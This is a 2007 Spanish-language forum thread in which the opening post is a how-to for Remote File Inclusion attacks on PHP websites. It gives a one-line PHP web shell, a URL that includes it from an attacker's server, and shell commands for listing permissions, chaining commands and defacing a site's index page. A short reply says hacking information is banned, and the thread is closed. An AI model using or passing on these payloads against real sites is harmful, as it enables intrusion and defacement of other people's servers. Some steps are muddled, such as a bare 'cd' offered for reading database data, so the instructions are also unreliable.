Fooros.Com Home Contact Site Map

Retroceder   Fooros.Com > Programas, Tecnologia y Hardware > Seguridad

Avisos

Tema Cerrado
 
Herramientas Desplegado
  #1  
Antiguo 18-mar-2007, 12:21
Avatar de colo69
Foorero Masters
 
Fecha de Ingreso: enero-2007
Ubicación: en la favela arlado de chorimovil
Mensajes: 225
Gracias: 0
Agradecido 0 veces en 0 Post
Enviar un mensaje por MSN a colo69
Predeterminado ataque RFI(Remote File Inclusion)

Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.

La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:
Para obtener la shell de la web solo necesitamos este codigo:
Cita:
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
Esa seria una web vulenerable.

Ejemplo:http//ww.rush.com/index.php?

Para poder hacer un ataque RFI tendremos que hacer esto:
Para saber si es vulnerable en el block de notas pegas esto
Cita:
<?

system($cmd)

?>
aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.

Oora procedemos a usar esto:

y listo asi explotaran el comando.

Un ejemplo de una shell explotada:

pwd—> nos muestra en que parte del servidor estamos por ejemplo:

Cita:
Home/host/www
Una Shell para sobreescribir un archivo es:
Cita:
/shell.txt?&cmd=Defaced By: Dembo_V2 >index.php.
Para ejecutar mas de un comando solo usen esto “;”

Cita:
/shell.txt?&cmd=[coamando];[Comando];[Comando]
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando
Cita:
/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos
Para saber los datos de la DB usa este comando:

Cita:
/shell.txt?&cmd=cd
Es todo

Salu2.
DEMBO_V2
__________________



R3D-0CuLT4

::::::::::::::::::::::::: [ www.fooros.com ] :::::::::::::::::::::::::
  #2  
Antiguo 18-mar-2007, 20:21
Avatar de Lestat
Foorero
 
Fecha de Ingreso: enero-2007
Ubicación: Vigo (España)
Mensajes: 82
Gracias: 0
Agradecido 0 veces en 0 Post
Predeterminado

En el foro de suguridad esta prohibida, cualquier informacion Hacker

Un Saludo
__________________

IMPRESCINDILES: AVG-ANTISPYWARE Y REGSEEKER
Si no sabeis como eliminar una infeccion o estais infectados, no dudeis en pegar un log de Hijackthis en el Foro de Seguridad.
Tema Cerrado

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder temas
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Desactivado
Pingbacks are Desactivado
Refbacks are Desactivado


La franja horaria es GMT -3. Ahora son las 19:19.

Descargar - Utilidades - Locura Juegos - Gratis Programas - Gratis Juegos - Bajar Gratis - Mirando Videos - Gratis Peliculas - Gratis Musica

Fooros.Com es una Web perteneciente a Tu Locura

SEO by vBSEO 3.1.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62